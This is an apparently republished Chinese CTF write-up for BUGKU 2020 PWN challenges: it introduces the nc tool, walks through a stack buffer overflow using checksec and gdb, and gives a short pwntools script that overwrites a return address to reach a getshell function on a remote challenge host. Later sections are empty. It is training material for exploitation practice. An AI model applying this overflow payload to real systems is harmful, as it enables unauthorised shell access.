[BUGKU][CTF][PWN][2020] PWN writeup
準備UBUNTU pwndbg pwntools
PWN1
關鍵字:nc
知識點:nc使用方法
https://www.cnblogs.com/nmap/p/6148306.html
nc命令是一個功能打包的網絡實用程序,它通過命令行在網絡上讀取和寫入數據;nc是為NMAP項目編寫的,是目前已分裂的netcat家族的頂峰,它被設計成一個可靠的后端工具,可以立即為其他用戶提供網絡連接應用程序和用戶。nc不僅可以使用IPv4和IPv6,而且可以為用戶提供無限的潛在用途。
在nc的大量功能中,有能力將nc鏈接在一起;TCP、UDP和到其他站點的SCTP端口;支持SSL;通過socks4或HTTP代理(帶有可選代理)進行代理連接身份驗證);一些一般原則適用于大多數應用程序,因此使您能夠立即向通常不支持它的軟件添加網絡支持。
步驟:
PWN 2
關鍵字:緩沖區一溢出
知識點:
步驟:準備UBUNTU 安裝pwndbg +pwntools
1.敏感名稱函數 getshell
查看main
2.checksec pwn2
3.gdb來進行調試,首先我們制造垃圾字符,接著運行這個程序,把垃圾字符復制粘貼上
4.寫腳本 運行腳本 要用python2 python3報錯TypeError: must be str, not bytes
from pwn import *p = remote("114.67.246.176", 15319) payload='a'*48+'a'*8+p64(0x400751) p.recvline() p.sendline(payload) p.interactive()PWN 3
關鍵字:nc
步驟:
PWN
關鍵字:
知識點:
步驟:
總結
以上是生活随笔為你收集整理的[BUGKU][CTF][PWN][2020] PWN writeup的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 微软Edge扩展工具箱旨在将Chrome
- 下一篇: npm 下载为什么很慢?解决方案来了